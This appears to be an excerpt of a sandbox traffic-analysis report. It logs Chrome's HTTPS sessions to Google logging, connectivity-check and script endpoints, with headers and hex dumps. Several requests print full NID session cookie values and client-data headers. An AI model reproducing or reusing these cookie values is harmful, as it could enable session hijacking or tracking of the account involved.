                                                                                                                                                                                                                                  2024-12-18 19:29:20 UTC1369INData Raw: fe 1e 5d bc 98 4e 4d 3f 9a bc ff c3 cb b7 93 09 c9 a7 f3 43 82 17 09 5c 3c 53 88 45 f3 38 ff cc a4 26 be 4d 1f 2c c2 04 8f 5b 75 54 fa c5 fb 63 43 db 62 d5 4a f6 f6 13 a0 70 34 69 37 50 88 ed 82 b0 5f 64 c2 67 09 98 2d 23 b2 9f 92 e0 b0 86 47 1e 3a 6a 75 eb 79 b4 70 83 f5 55 a7 dd 5b d0 f8 b7 41 f8 a6 46 5c 70 d0 06 7a a5 02 e6 b2 29 05 74 ef 84 5d 56 48 64 35 9f e0 3b 38 4e 02 10 00 9e 3d a0 58 a7 6b f8 32 b4 ab af 53 09 54 27 72 eb ee 03 a9 ad 73 52 88 8b 84 71 e4 26 a5 ec bc 34 e7 a0 e2 ea ed 50 e4 7d 0e 89 5f ab 6f fd e5 ba 14 48 98 2e b9 e4 c7 3b eb 61 f8 11 b6 6c f4 40 88 e6 20 1d dd aa 47 41 cb ad 1a ec e1 34 cf 11 6f 5d 18 50 01 31 bb 8f bb 10 e0 e7 57 dc 48 ca be d0 a4 fc bb 9c a6 72 bf 3a 79 54 ce 99 b2 5e 1a 6d ae 11 a8 c1 7f 06 64 6d 8c 8a ef
                                                                                                                                                                                                                                  Data Ascii: ]NM?C\<SE8&M,[uTcCbJp4i7P_dg-#G:juypU[AF\pz)t]VHd5;8N=Xk2ST'rsRq&4P}_oH.;al@ GA4o]P1WHr:yT^mdm
                                                                                                                                                                                                                                  2024-12-18 19:29:20 UTC1369INData Raw: 5e 68 3b ee 56 28 82 b6 44 b3 4f b1 6e ea 8f c5 b1 ab a7 0e c6 c2 5b a4 a6 a6 34 99 a5 6d 03 f2 f4 97 cc 1e 7d ad 58 6b 63 88 8a 31 cc 96 16 1c 83 bb b5 9d bc 0f 47 78 39 b0 58 0f cf 66 1b 03 75 bb 83 b9 a7 7f 78 5d c7 b0 df 58 d8 a5 28 7b 2d 42 71 5a 32 9c fd ed 43 33 2f 49 7c ae 07 39 2c 11 26 f3 73 c0 b0 a1 b6 7d fd 36 b3 b5 a8 46 56 d6 f0 1c 2e 44 6e 4b 5f a9 f3 93 5b 39 33 6a c2 fd 3d 86 fd cd f4 ef 09 86 f5 98 3e cc 5a 6b fa d3 98 72 c7 4b 76 a6 a9 6f 58 d2 39 a8 00 cb c3 94 82 e5 24 06 29 be 73 ce e9 9e f4 46 57 b6 c0 9e f6 a6 bb df 08 e9 d9 16 cb 37 03 bd 98 14 43 7d 9b 7b ef 34 ff a5 6a 4c 8d e1 d6 ed a0 90 3d e4 81 52 7c 47 c1 4c 6f f2 7a 85 7c 35 1b 70 62 55 cc 5d c8 c1 8c 7d 1b 2b b0 73 c4 a9 6f cd 79 c4 0b 42 99 19 17 51 0d 21 46 fc ff 8e 10
                                                                                                                                                                                                                                  Data Ascii: ^h;V(DOn[4m}Xkc1Gx9Xfux]X({-BqZ2C3/I|9,&s}6FV.DnK_[93j=>ZkrKvoX9$)sFW7C}{4jL=R|GLoz|5pbU]}+soyBQ!F
                                                                                                                                                                                                                                  2024-12-18 19:29:20 UTC1369INData Raw: 04 97 dc 23 ce da ee 0c 71 7c 08 57 8d ea c8 88 bd 38 c4 ab 72 aa cb 0c fb 1e f0 88 df 96 27 d4 2e e7 3e 09 ef da 6d 5e 68 dd 97 44 6e 43 0f a5 78 d8 96 b5 7b ed aa 8c 7f e4 51 c6 00 0f 60 c1 ab c9 f1 98 4f ea a7 e8 4d f6 f5 d1 7c 62 ca 0a fc 0d 53 7d cb c3 7b dd f7 68 49 ff 85 02 73 71 4d 76 17 21 a3 86 a8 c6 37 e4 ed 11 d7 30 1a dc bb f3 fb 6d b2 87 d4 d3 0d d8 9f 7d 83 8d 79 ea b0 1b 25 33 e4 7b fa e5 af 56 ab 75 a8 35 93 b5 b7 5d e2 33 4c 87 6e e5 67 65 de e5 2c 2a 01 0a 35 31 09 c2 2c e6 1f 2c 01 80 80 f7 08 80 b2 cc e0 7e 77 27 a7 77 56 10 8e 4d 8e e1 56 96 36 3c 86 bd c7 21 1b 56 94 18 50 3c 3e 76 a1 48 f5 78 9a 48 c6 49 95 18 b3 02 fb f2 57 33 78 50 c2 99 b1 77 d7 f1 3a ec 36 3c d4 45 ad 47 44 4d 8d 38 25 cf 28 f3 ed cd 9a 3a bf 60 6f 77 99 d6 9e
                                                                                                                                                                                                                                  Data Ascii: #q|W8r'.>m^hDnCx{Q`OM|bS}{hIsqMv!70m}y%3{Vu5]3Lnge,*51,,~w'wVMV6<!VP<>vHxHIW3xPw:6<EGDM8%(:`ow
                                                                                                                                                                                                                                  2024-12-18 19:29:20 UTC1369INData Raw: 07 b2 30 78 3f 7a 8d 7b 0c da 26 3e ef a9 95 c6 8e 9a 2e cd cf a4 79 0d 6b 57 ba 17 bc 2f 06 88 c8 9d c1 91 85 5c 14 90 05 e8 4b 2d be 2d 68 ce 6a 69 07 ed 67 2e ac 4c 6b b7 da 39 0e af 7c a1 f8 97 bf d9 a4 2b 79 f2 8d 67 76 2c 58 00 da 2f d6 f8 ad c7 74 4e 6b fe 79 6b 8b 44 7b d2 51 a5 44 de 8c 40 99 78 61 72 a9 a2 eb 38 c3 e9 80 b6 9b f5 68 43 3f 21 07 82 c9 af 05 90 33 19 e3 8d 50 dc 70 42 08 89 e2 9d a0 af 9e c3 7c 78 e1 8a 36 4f 8d 25 6b ee e6 68 8e 34 fa 23 22 83 fd 2c 1e 5c d2 86 bc c4 26 e3 31 1c 16 12 07 a0 e4 b7 dc cd ca 11 90 61 73 3f c1 c3 f4 fb eb ff b8 b7 6f 53 f4 66 10 cb 36 07 b8 31 e4 5c 7d cd 6e 0d 2e 03 1e 6b 76 01 6e 64 9e 19 5f 2b 8a c7 7f 4a e7 de a4 4b b9 48 35 10 af 3a e7 9d cf e5 32 30 48 17 6d b4 02 38 b3 d2 a7 8c 81 fb bc 0f 5c
                                                                                                                                                                                                                                  Data Ascii: 0x?z{&>.ykW/\K--hjig.Lk9|+ygv,X/tNkykD{QD@xar8hC?!3PpB|x6O%kh4#",\&1as?oSf61\}n.kvnd_+JKH5:20Hm8\
                                                                                                                                                                                                                                  2024-12-18 19:29:20 UTC1369INData Raw: 53 e6 91 aa 1d fc 59 93 83 3b 61 bd b7 81 8b b1 4b 7a ed da fa 6a 69 c5 23 e8 fe 62 bd 24 ba 78 a0 60 ca 10 d3 fa b6 47 4c 3b 16 02 fc f2 ee 54 cd cd 3a d2 c3 77 58 cd 84 29 d2 d6 63 62 eb 18 6d 2a f0 70 0c b7 c7 24 5e 1c 1e d9 29 90 41 df b6 e5 78 d2 0d e9 f3 10 cd 0a df 2f 31 da 65 e7 bd 38 b9 e6 54 94 76 6a 08 d7 cf 50 98 6d 43 50 d6 1c 2c e6 67 06 88 27 92 34 0b 69 c4 db 27 a5 9d 52 bb 30 76 aa 46 e0 05 c2 c0 99 4a 6e 7a 92 b9 fc 8b e3 1a 28 0b b2 7c 05 17 4a e9 08 a1 e9 ad 3b 19 6e 68 4d 05 7f 88 72 ef 28 b1 73 7f ca d9 57 ba 2e 09 82 aa 16 6f c7 56 1e 04 39 ef 8b 1d 41 2c 1a f6 2c f5 73 5c 1a 2b 4a fe 11 fa 94 16 e7 8d c4 09 1f 78 b0 bd 44 fb 4a 87 9b 72 e0 76 52 45 cb 40 63 84 0c 30 ef 11 e1 f2 32 30 70 18 de c1 0a ba b4 40 91 37 b0 94 60 41 be da
                                                                                                                                                                                                                                  Data Ascii: SY;aKzji#b$x`GL;T:wX)cbm*p$^)Ax/1e8TvjPmCP,g'4i'R0vFJnz(|J;nhMr(sW.oV9A,,s\+JxDJrvRE@c020p@7`A
                                                                                                                                                                                                                                  2024-12-18 19:29:20 UTC1369INData Raw: c2 21 71 94 dc be 4d 53 7c b0 32 f9 69 c6 ce d0 3e e5 1a 8e 65 b0 18 9c fc 23 bc b8 2f 2a 1c b5 2d cd 48 70 b6 82 42 8b a9 d0 fa 9c 28 30 55 5e 9d ad a9 b2 11 b4 0e 83 67 98 0b c5 f0 6a db 02 84 c4 d8 7d 6a 35 b6 75 c3 87 ba 21 9e 92 70 12 10 25 3b de 39 bc d5 a3 84 b5 21 d0 89 e7 59 a4 57 be ae ef 8f 22 c6 4f 87 84 b7 a2 2c e5 9d 6a 32 4b 61 da c8 4b 32 b5 15 04 67 c8 c6 3a ec e6 d7 d3 8a b2 96 25 b2 75 85 a6 c3 2f cb fe a9 ec 3f 3d 84 f5 ff f4 fb 77 31 cf 99 24 2e 1a 02 85 76 b0 b9 0c 94 74 fa 59 66 f1 1c 86 e7 8a a9 db 34 20 03 ab 20 fe 53 60 90 c5 f3 e3 5b 19 3e 1a ba 37 24 b9 06 0c d0 5b fe 9b 9c 53 c8 2c 29 c1 21 1c ed b2 7d 36 46 df ff ad ec fa 34 e3 55 b3 ea 46 e1 6e 8e 89 3d c5 d7 79 e6 4e 61 5b e5 22 13 e6 89 6d 72 bd 61 97 86 8a c8 d1 3b 68 fb
                                                                                                                                                                                                                                  Data Ascii: !qMS|2i>e#/*-HpB(0U^gj}j5u!p%;9!YW"O,j2KaK2g:%u/?=w1$.vtYf4 S`[>7$[S,)!}6F4UFn=yNa["mra;h


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  58192.168.2.1649826142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:28 UTC1310OUTPOST /log?hasfast=true&authuser=0&format=json HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 954
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://accounts.google.com
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://accounts.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=CvBdONSJlOTXnPiCO4EuPPFwvm0EaFxj7trDUyhNNdFc6G_FN1wH_QPEbYiZW0zQgkXFtiKQ0CKMDykCIwoc1fzoCwzEPxrgu2FWeoTKNu9NzfggmrBkrEfHI_tjT5TooUS_woqpRCCLaM_geIXvbdzesLAux08s102TrUKtXHfaEykl1Gw9Z1ln7n90-KkG
                                                                                                                                                                                                                                  2024-12-18 19:29:28 UTC954OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 2d 55 53 22 2c 6e 75 6c 6c 2c 22 62 6f 71 5f 69 64 65 6e 74 69 74 79 66 72 6f 6e 74 65 6e 64 61 75 74 68 75 69 73 65 72 76 65 72 5f 32 30 32 34 31 32 31 30 2e 30 34 5f 70 30 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 33 2c
                                                                                                                                                                                                                                  Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en-US",null,"boq_identityfrontendauthuiserver_20241210.04_p0",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[3,
                                                                                                                                                                                                                                  2024-12-18 19:29:29 UTC499INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:29 GMT
                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-12-18 19:29:29 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                  2024-12-18 19:29:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  59192.168.2.1649827142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:31 UTC1310OUTPOST /log?hasfast=true&authuser=0&format=json HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 724
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://accounts.google.com
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://accounts.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=CvBdONSJlOTXnPiCO4EuPPFwvm0EaFxj7trDUyhNNdFc6G_FN1wH_QPEbYiZW0zQgkXFtiKQ0CKMDykCIwoc1fzoCwzEPxrgu2FWeoTKNu9NzfggmrBkrEfHI_tjT5TooUS_woqpRCCLaM_geIXvbdzesLAux08s102TrUKtXHfaEykl1Gw9Z1ln7n90-KkG
                                                                                                                                                                                                                                  2024-12-18 19:29:31 UTC724OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 2d 55 53 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 33 2c 31 2c 30 2c 30 2c 30 5d 5d 5d 2c 35 35 38 2c 5b 5b 22 31 37 33 34 35 35 30 31 36 33 30 30 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75
                                                                                                                                                                                                                                  Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en-US",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[3,1,0,0,0]]],558,[["1734550163000",null,null,nu
                                                                                                                                                                                                                                  2024-12-18 19:29:31 UTC499INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:31 GMT
                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-12-18 19:29:31 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                  2024-12-18 19:29:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  60192.168.2.1649858172.217.19.2284436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:42 UTC698OUTGET /generate_204 HTTP/1.1
                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=cW9cnGXTgQtIiZ7z-ENJ5DVTszKtaNs5d4mHofa4p-JvtK7Xpo_ZZO8vJSpTycO0rKkRsnajljxdf2c0JfuG_uqbRqXxTHnbHLXksz6GLH-p0EKZAGg9jwHPkRfp29YQfrxPHB40nV4Lb-Z5d3mg8STPfLFvxZAWY9AxijTcPROCDg8e8YKVmDtGGq6IsRi_5ePEp8ARCOQFTlIYyoubHF0MJ0pRxuMvVbhFJZgwHeL_APYIN6IO_AjG7fV-EbgykSiD
                                                                                                                                                                                                                                  2024-12-18 19:29:42 UTC203INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:42 GMT
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  61192.168.2.1649874142.250.181.464436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:46 UTC1007OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                  Host: apis.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=cW9cnGXTgQtIiZ7z-ENJ5DVTszKtaNs5d4mHofa4p-JvtK7Xpo_ZZO8vJSpTycO0rKkRsnajljxdf2c0JfuG_uqbRqXxTHnbHLXksz6GLH-p0EKZAGg9jwHPkRfp29YQfrxPHB40nV4Lb-Z5d3mg8STPfLFvxZAWY9AxijTcPROCDg8e8YKVmDtGGq6IsRi_5ePEp8ARCOQFTlIYyoubHF0MJ0pRxuMvVbhFJZgwHeL_APYIN6IO_AjG7fV-EbgykSiD
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC916INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                  Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                  Content-Length: 117446
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Wed, 11 Dec 2024 22:22:46 GMT
                                                                                                                                                                                                                                  Expires: Thu, 11 Dec 2025 22:22:46 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT
                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Age: 594421
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC474INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
